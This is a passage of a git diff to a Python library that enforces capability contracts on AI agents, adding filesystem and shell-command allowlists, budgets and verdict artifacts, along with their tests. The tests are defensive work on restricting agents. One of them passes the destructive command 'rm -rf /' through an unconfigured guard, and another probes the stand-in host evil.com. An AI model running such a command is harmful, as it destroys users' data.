"#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." } } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." } } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." + } + } } } } diff --git a/src/agent_contracts/types.py b/src/agent_contracts/types.py index 5120ead..5b35b1d 100644 --- a/src/agent_contracts/types.py +++ b/src/agent_contracts/types.py @@ -45,6 +45,21 @@ class PostconditionDef: # --- Tier 1: Enforceable --- +@dataclass(frozen=True) +class FilesystemAuthorization: + """Authorized repo-local filesystem scopes for coding/build agents.""" + + read: List[str] = field(default_factory=list) + write: List[str] = field(default_factory=list) + + +@dataclass(frozen=True) +class ShellAuthorization: + """Authorized shell command patterns for coding/build agents.""" + + commands: List[str] = field(default_factory=list) + + @dataclass(frozen=True) class EffectsAuthorized: """Capability scope — what the agent MAY do (default: deny all). @@ -55,6 +70,8 @@ class EffectsAuthorized: tools: List[str] = field(default_factory=list) network: List[str] = field(default_factory=list) state_writes: List[str] = field(default_factory=list) + filesystem: Optional[FilesystemAuthorization] = None + shell: Optional[ShellAuthorization] = None @dataclass(frozen=True) @@ -65,6 +82,7 @@ class ResourceBudgets: max_tokens: Optional[int] = None max_tool_calls: Optional[int] = None max_duration_seconds: Optional[float] = None + max_shell_commands: Optional[int] = None @dataclass(frozen=True) @@ -161,6 +179,7 @@ class ObservabilityConfig: traces: Optional[TracesConfig] = None metrics: List[MetricDef] = field(default_factory=list) violation_events: Optional[ViolationEventsConfig] = None + run_artifact_path: Optional[str] = None @dataclass(frozen=True) @@ -243,5 +262,8 @@ class Contract: versioning: Optional[VersioningConfig] = None slo: Optional[SLOConfig] = None + # Runtime metadata + source_path: Optional[str] = field(default=None, repr=False) + # Raw data (preserves x- extensions and unknown fields) raw: Optional[Dict[str, Any]] = field(default=None, repr=False) diff --git a/tests/conftest.py b/tests/conftest.py index 4490c09..cf84610 100644 --- a/tests/conftest.py +++ b/tests/conftest.py @@ -14,16 +14,13 @@ def tmp_yaml(tmp_path: Path): """Factory fixture — write a dict as YAML and return the path.""" def _write(data: Dict[str, Any], name: str = "contract.yaml") -> Path: - p = tmp_path / name - p.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / name + path.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") + return path return _write -# ---- Canonical contract data for each tier ---- - - @pytest.fixture def tier0_data() -> Dict[str, Any]: """Minimal Tier 0 contract (4 fields).""" @@ -40,7 +37,7 @@ def tier0_data() -> Dict[str, Any]: @pytest.fixture def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 1 contract with schemas, effects, and budgets.""" + """Tier 1 contract with coding/build authorization surfaces.""" return { **tier0_data, "inputs": {"schema": {"type": "object", "properties": {"query": {"type": "string"}}}}, @@ -50,6 +47,11 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "tools": ["search", "database.read"], "network": ["https://api.example.com/*"], "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**", "tests/**"], + }, + "shell": {"commands": ["python -m pytest *", "python -m ruff check *"]}, } }, "resources": { @@ -58,6 +60,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "max_tokens": 10000, "max_tool_calls": 20, "max_duration_seconds": 30.0, + "max_shell_commands": 5, } }, } @@ -65,7 +68,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: @pytest.fixture def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 2 contract with all composable fields.""" + """Tier 2 contract with composable fields and verdict artifact path.""" return { **tier1_data, "effects": { @@ -97,6 +100,7 @@ def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: {"name": "latency_ms", "type": "histogram"}, ], "violation_events": {"emit": True, "destination": "otel"}, + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json", }, "versioning": { "build_id": "sha256:abc123", diff --git a/tests/test_budgets.py b/tests/test_budgets.py index 2b20d43..0492e2a 100644 --- a/tests/test_budgets.py +++ b/tests/test_budgets.py @@ -3,6 +3,7 @@ from __future__ import annotations import threading +import time import pytest @@ -18,52 +19,54 @@ def test_no_config_allows_all(self) -> None: tracker.add_tokens(1_000_000) for _ in range(1000): tracker.record_tool_call() - tracker.check_all() # Should not raise + tracker.record_shell_command() + tracker.check_all() def test_cost_limit(self) -> None: - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00)) tracker.add_cost(0.50) tracker.add_cost(0.40) with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.add_cost(0.20) def test_token_limit(self) -> None: - budgets = ResourceBudgets(max_tokens=1000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tokens=1000)) tracker.add_tokens(800) with pytest.raises(BudgetExceededError, match="tokens"): tracker.add_tokens(300) def test_tool_call_limit(self) -> None: - budgets = ResourceBudgets(max_tool_calls=3) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=3)) tracker.record_tool_call() tracker.record_tool_call() tracker.record_tool_call() with pytest.raises(BudgetExceededError, match="tool_calls"): tracker.record_tool_call() - def test_duration_limit(self) -> None: - budgets = ResourceBudgets(max_duration_seconds=0.01) - tracker = BudgetTracker(budgets) - import time + def test_shell_command_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_shell_commands=1)) + tracker.record_shell_command() + with pytest.raises(BudgetExceededError, match="shell_commands"): + tracker.record_shell_command() + def test_duration_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_duration_seconds=0.01)) time.sleep(0.02) with pytest.raises(BudgetExceededError, match="duration_seconds"): tracker.check_duration() def test_snapshot(self) -> None: - budgets = ResourceBudgets(max_cost_usd=10.0) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=10.0)) tracker.add_cost(1.50) tracker.add_tokens(500) tracker.record_tool_call() - snap = tracker.snapshot() - assert snap.cost_usd == 1.50 - assert snap.tokens == 500 - assert snap.tool_calls == 1 - assert snap.elapsed_seconds >= 0 + tracker.record_shell_command() + snapshot = tracker.snapshot() + assert snapshot.cost_usd == 1.50 + assert snapshot.tokens == 500 + assert snapshot.tool_calls == 1 + assert snapshot.shell_commands == 1 + assert snapshot.elapsed_seconds >= 0 def test_cost_callback(self) -> None: cost_value = [0.0] @@ -71,37 +74,34 @@ def test_cost_callback(self) -> None: def get_cost() -> float: return cost_value[0] - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets, cost_callback=get_cost) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00), cost_callback=get_cost) cost_value[0] = 0.50 - tracker.check_all() # OK + tracker.check_all() cost_value[0] = 1.50 with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.check_all() def test_reset(self) -> None: - budgets = ResourceBudgets(max_tool_calls=5) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=5, max_shell_commands=5)) for _ in range(4): tracker.record_tool_call() + tracker.record_shell_command() tracker.reset() - snap = tracker.snapshot() - assert snap.tool_calls == 0 - assert snap.cost_usd == 0.0 + snapshot = tracker.snapshot() + assert snapshot.tool_calls == 0 + assert snapshot.shell_commands == 0 + assert snapshot.cost_usd == 0.0 def test_negative_cost_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_cost(-1.0) + BudgetTracker().add_cost(-1.0) def test_negative_tokens_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_tokens(-1) + BudgetTracker().add_tokens(-1) def test_thread_safety(self) -> None: - budgets = ResourceBudgets(max_tool_calls=10_000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=10_000)) errors: list = [] def call_many() -> None: @@ -112,13 +112,13 @@ def call_many() -> None: errors.append(True) threads = [threading.Thread(target=call_many) for _ in range(5)] - for t in threads: - t.start() - for t in threads: - t.join() + for thread in threads: + thread.start() + for thread in threads: + thread.join() - snap = tracker.snapshot() - assert snap.tool_calls == 5000 + assert not errors + assert tracker.snapshot().tool_calls == 5000 def test_budget_exceeded_error_fields(self) -> None: err = BudgetExceededError("cost_usd", 5.23, 5.00) diff --git a/tests/test_cli.py b/tests/test_cli.py index fda48bf..67338e9 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -2,6 +2,7 @@ from __future__ import annotations +import json from pathlib import Path from typing import Any, Dict @@ -13,112 +14,122 @@ @pytest.fixture -def runner(): +def runner() -> CliRunner: return CliRunner() @pytest.fixture def contract_file(tmp_path: Path, tier1_data: Dict[str, Any]) -> Path: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / "contract.yaml" + path.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") + return path class TestValidate: - def test_valid_contract(self, runner, contract_file) -> None: + def test_valid_contract(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file)]) assert result.exit_code == 0 assert "PASSED" in result.output + assert "Coding/build surfaces" in result.output - def test_valid_contract_json(self, runner, contract_file) -> None: + def test_valid_contract_json(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file), "--json-output"]) assert result.exit_code == 0 - import json data = json.loads(result.output) assert data["valid"] is True assert data["tier"] == 1 + assert data["coding_surfaces"]["filesystem_write"] == ["src/**", "tests/**"] - def test_invalid_contract(self, runner, tmp_path) -> None: + def test_invalid_contract(self, runner: CliRunner, tmp_path: Path) -> None: bad = tmp_path / "bad.yaml" bad.write_text(yaml.dump({"agent_contract": "bad"}, sort_keys=False), encoding="utf-8") result = runner.invoke(main, ["validate", str(bad)]) assert result.exit_code == 1 assert "FAILED" in result.output - def test_file_not_found(self, runner) -> None: - result = runner.invoke(main, ["validate", "/nonexistent.yaml"]) - assert result.exit_code != 0 - - def test_shows_recommendations(self, runner, tmp_path, tier0_data) -> None: - p = tmp_path / "tier0.yaml" - p.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") - result = runner.invoke(main, ["validate", str(p)]) + def test_shows_recommendations(self, runner: CliRunner, tmp_path: Path, tier0_data: Dict[str, Any]) -> None: + path = tmp_path / "tier0.yaml" + path.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") + result = runner.invoke(main, ["validate", str(path)]) assert result.exit_code == 0 assert "Recommendations" in result.output class TestCheckCompat: - def test_compatible(self, runner, contract_file) -> None: + def test_compatible(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file)]) assert result.exit_code == 0 - def test_json_output(self, runner, contract_file) -> None: + def test_json_output(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file), "-j"]) assert result.exit_code == 0 - import json - data = json.loads(result.output) - assert "compatible" in data + assert "compatible" in json.loads(result.output) class TestInit: - def test_template_generation(self, runner) -> None: + def test_template_generation(self, runner: CliRunner) -> None: result = runner.invoke(main, ["init", "--name", "test-agent"]) assert result.exit_code == 0 assert "test-agent" in result.output assert "postconditions" in result.output - def test_output_to_file(self, runner, tmp_path) -> None: + def test_coding_template_generation(self, runner: CliRunner) -> None: + result = runner.invoke(main, ["init", "--template", "coding"]) + assert result.exit_code == 0 + assert "filesystem:" in result.output + assert "run_artifact_path" in result.output + + def test_output_to_file(self, runner: CliRunner, tmp_path: Path) -> None: out = tmp_path / "generated.yaml" result = runner.invoke(main, ["init", "--name", "test", "-o", str(out)]) assert result.exit_code == 0 assert out.exists() - def test_from_trace(self, runner, tmp_path) -> None: + def test_from_trace(self, runner: CliRunner, tmp_path: Path) -> None: trace_file = tmp_path / "traces.jsonl" traces = [ - {"agent": {"name": "trace-agent", "version": "1.0.0"}, - "tool_calls": [{"name": "search"}, {"name": "database.read"}], - "usage": {"cost_usd": 0.05, "total_tokens": 500}, - "duration_seconds": 2.5}, + { + "agent": {"name": "trace-agent", "version": "1.0.0"}, + "tool_calls": [{"name": "search"}, {"name": "database.read"}], + "shell_commands": ["python -m pytest tests/test_app.py"], + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "usage": {"cost_usd": 0.05, "total_tokens": 500}, + "duration_seconds": 2.5, + }, ] - trace_file.write_text( - "\n".join(__import__("json").dumps(t) for t in traces), - encoding="utf-8", - ) + trace_file.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") result = runner.invoke(main, ["init", "--from-trace", str(trace_file)]) assert result.exit_code == 0 assert "trace-agent" in result.output - assert "search" in result.output + assert "filesystem" in result.output + assert "shell" in result.output + + +class TestCheckVerdict: + def test_pass(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "pass", "final_gate": "allowed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 0 + assert "Outcome: pass" in result.output + + def test_fail(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "fail", "final_gate": "failed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 1 class TestTestCommand: - def test_no_eval_suite(self, runner, contract_file) -> None: + def test_no_eval_suite(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["test", str(contract_file)]) assert result.exit_code == 0 assert "Postconditions" in result.output - def test_with_eval_suite(self, runner, contract_file, tmp_path) -> None: + def test_with_eval_suite(self, runner: CliRunner, contract_file: Path, tmp_path: Path) -> None: eval_dir = tmp_path / "evals" eval_dir.mkdir() eval_file = eval_dir / "basic.jsonl" - import json - cases = [ - {"output": {"status": "ok"}}, - {"output": None}, - ] - eval_file.write_text( - "\n".join(json.dumps(c) for c in cases), encoding="utf-8" - ) + eval_file.write_text("\n".join(json.dumps(c) for c in [{"output": {"status": "ok"}}, {"output": None}]), encoding="utf-8") result = runner.invoke(main, ["test", str(contract_file), "--eval-suite", str(eval_dir)]) - # At least one should pass (non-None output), one may fail assert "Results:" in result.output diff --git a/tests/test_composition.py b/tests/test_composition.py index a4c13d5..21821d0 100644 --- a/tests/test_composition.py +++ b/tests/test_composition.py @@ -20,7 +20,7 @@ def test_compatible_contracts(self, tmp_yaml, tier2_data: Dict[str, Any]) -> Non "authorized": {"tools": ["search"], "network": [], "state_writes": []}, "declared": {"tools": ["search"], "network": [], "state_writes": []}, }, - "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0}}, + "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0, "max_shell_commands": 3}}, "delegation": { "max_depth": 1, "allowed_agents": [], diff --git a/tests/test_effects.py b/tests/test_effects.py index 3a18848..672a9fa 100644 --- a/tests/test_effects.py +++ b/tests/test_effects.py @@ -11,60 +11,70 @@ union_declared, validate_declared_subset, ) -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) class TestEffectGuard: def test_no_config_allows_all(self) -> None: guard = EffectGuard() assert guard.check_tool("anything") is True + assert guard.check_file_read("secret.txt") is True + assert guard.check_shell_command("rm -rf /") is True assert not guard.is_configured def test_configured_allows_listed_tool(self) -> None: - auth = EffectsAuthorized(tools=["search", "database.read"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search", "database.read"])) assert guard.check_tool("search") is True assert guard.check_tool("database.read") is True def test_configured_denies_unlisted_tool(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) assert guard.check_tool("delete_all") is False def test_glob_pattern_matching(self) -> None: - auth = EffectsAuthorized(tools=["database.*", "api.user.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["database.*", "api.user.*"])) assert guard.check_tool("database.read") is True assert guard.check_tool("database.write") is True assert guard.check_tool("api.user.get") is True assert guard.check_tool("api.admin.delete") is False def test_require_tool_raises(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) with pytest.raises(EffectDeniedError, match="tool 'delete'"): guard.require_tool("delete") - def test_require_tool_passes(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) - guard.require_tool("search") # Should not raise - def test_network_check(self) -> None: - auth = EffectsAuthorized(network=["https://api.example.com/*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(network=["https://api.example.com/*"])) assert guard.check_network("https://api.example.com/search") is True assert guard.check_network("https://evil.com/data") is False def test_state_write_check(self) -> None: - auth = EffectsAuthorized(state_writes=["tickets.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(state_writes=["tickets.*"])) assert guard.check_state_write("tickets.status") is True assert guard.check_state_write("users.password") is False + def test_filesystem_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"])) + ) + assert guard.check_file_read("src/main.py") is True + assert guard.check_file_write("src/main.py") is True + assert guard.check_file_write("tests/test_main.py") is False + + def test_shell_command_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command("python -m pytest tests/test_app.py") is True + assert guard.check_shell_command("python -m mypy src") is False + def test_empty_allowlist_denies_all(self) -> None: - auth = EffectsAuthorized(tools=[], network=[], state_writes=[]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=[], network=[], state_writes=[])) assert guard.check_tool("anything") is False assert guard.is_configured @@ -85,34 +95,38 @@ def test_glob_intersection(self) -> None: assert "database.write" in result.tools assert "admin.delete" not in result.tools - def test_empty_parent_denies_all(self) -> None: - parent = EffectsAuthorized(tools=[]) - child = EffectsAuthorized(tools=["search", "read"]) + def test_filesystem_and_shell_intersection(self) -> None: + parent = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"]), + shell=ShellAuthorization(commands=["python -m pytest *", "python -m ruff check *"]), + ) + child = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**", "tests/**"], write=["tests/**"]), + shell=ShellAuthorization(commands=["python -m pytest tests/*", "python -m mypy *"]), + ) result = intersect_authorized(parent, child) - assert result.tools == [] + assert result.filesystem is not None + assert result.filesystem.read == ["src/**"] + assert result.filesystem.write == [] + assert result.shell is not None + assert result.shell.commands == ["python -m pytest tests/*"] class TestUnionDeclared: def test_basic_union(self) -> None: - a = EffectsDeclared(tools=["search"], network=["https://a.com"]) - b = EffectsDeclared(tools=["write"], network=["https://b.com"]) - result = union_declared(a, b) + result = union_declared( + EffectsDeclared(tools=["search"], network=["https://a.com"]), + EffectsDeclared(tools=["write"], network=["https://b.com"]), + ) assert set(result.tools) == {"search", "write"} assert set(result.network) == {"https://a.com", "https://b.com"} - def test_deduplication(self) -> None: - a = EffectsDeclared(tools=["search", "read"]) - b = EffectsDeclared(tools=["search", "write"]) - result = union_declared(a, b) - assert result.tools == ["search", "read", "write"] - class TestValidateDeclaredSubset: def test_valid_subset(self) -> None: declared = EffectsDeclared(tools=["search"]) authorized = EffectsAuthorized(tools=["search", "database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] + assert validate_declared_subset(declared, authorized) == [] def test_invalid_tool(self) -> None: declared = EffectsDeclared(tools=["search", "delete_all"]) @@ -120,9 +134,3 @@ def test_invalid_tool(self) -> None: violations = validate_declared_subset(declared, authorized) assert len(violations) == 1 assert "delete_all" in violations[0] - - def test_glob_matching(self) -> None: - declared = EffectsDeclared(tools=["database.read"]) - authorized = EffectsAuthorized(tools=["database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] diff --git a/tests/test_enforcer.py b/tests/test_enforcer.py index a707893..1c45a0e 100644 --- a/tests/test_enforcer.py +++ b/tests/test_enforcer.py @@ -2,96 +2,160 @@ from __future__ import annotations +import json +from pathlib import Path from typing import Any, Dict import pytest -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + enforce_contract, + load_verdict_artifact, +) from agent_contracts.loader import load_contract +from agent_contracts.postconditions import PostconditionError @pytest.fixture def enforcer_tier1(tmp_yaml, tier1_data: Dict[str, Any]): - """ContractEnforcer with a Tier 1 contract.""" - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) return ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) +@pytest.fixture +def coding_contract_data() -> Dict[str, Any]: + return { + "agent_contract": "0.1.0", + "identity": {"name": "repo-build-agent", "version": "0.1.0"}, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + "effects": { + "authorized": { + "tools": [], + "network": [], + "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**"], + }, + "shell": {"commands": ["python -m pytest *"]}, + } + }, + "resources": {"budgets": {"max_shell_commands": 1}}, + "observability": {"run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json"}, + } + + class TestContractEnforcer: def test_authorized_tool_passes(self, enforcer_tier1) -> None: - enforcer_tier1.check_tool_call("search") # In allowlist + enforcer_tier1.check_tool_call("search") def test_unauthorized_tool_raises(self, enforcer_tier1) -> None: with pytest.raises(ContractViolation, match="not authorized"): enforcer_tier1.check_tool_call("delete_everything") - def test_tool_call_budget(self, tmp_yaml, tier1_data) -> None: - tier1_data["resources"]["budgets"]["max_tool_calls"] = 2 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("search") - enforcer.check_tool_call("database.read") - with pytest.raises(ContractViolation, match="tool_calls"): - enforcer.check_tool_call("search") + def test_file_write_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract_path = tmp_yaml(coding_contract_data) + contract = load_contract(contract_path) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="File write"): + enforcer.check_file_write("tests/test_app.py") + verdict = enforcer.finalize_run() + assert verdict.outcome == "blocked" + assert Path(verdict.artifacts["verdict_path"]).exists() + loaded = load_verdict_artifact(verdict.artifacts["verdict_path"]) + assert loaded["outcome"] == "blocked" + + def test_shell_command_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="Shell command"): + enforcer.check_shell_command("python -m mypy src") + assert enforcer.finalize_run().outcome == "blocked" + + def test_shell_command_budget(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.check_shell_command("python -m pytest tests/test_app.py") + with pytest.raises(ContractViolation, match="shell_commands"): + enforcer.check_shell_command("python -m pytest tests/test_other.py") + + def test_fail_verdict_when_required_checks_fail(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "fail", exit_code=1) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "fail" + assert verdict.final_gate == "failed" + assert any(v["violated_clause"] == "contract.postconditions.repo_checks_green" for v in verdict.violations) + + def test_pass_verdict_writes_artifact(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "pass" + verdict_path = Path(verdict.artifacts["verdict_path"]) + assert verdict_path.exists() + payload = json.loads(verdict_path.read_text(encoding="utf-8")) + assert payload["final_gate"] == "allowed" + assert payload["budgets"]["shell_commands"] == 0 def test_cost_budget(self, enforcer_tier1) -> None: enforcer_tier1.add_cost(0.30) enforcer_tier1.add_cost(0.15) with pytest.raises(ContractViolation, match="cost_usd"): - enforcer_tier1.add_cost(0.10) # Total 0.55 > 0.50 limit + enforcer_tier1.add_cost(0.10) def test_token_budget(self, tmp_yaml, tier1_data) -> None: tier1_data["resources"]["budgets"]["max_tokens"] = 1000 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier1_data)), violation_destination="callback", violation_callback=lambda e: None) enforcer.add_tokens(800) with pytest.raises(ContractViolation, match="tokens"): enforcer.add_tokens(300) def test_input_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": "hello"}) - assert errors == [] + assert enforcer_tier1.validate_input({"query": "hello"}) == [] def test_input_validation_failure(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": 123}) # Should be string - assert len(errors) > 0 + assert enforcer_tier1.validate_input({"query": 123}) def test_output_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_output({"result": "answer"}) - assert errors == [] - - def 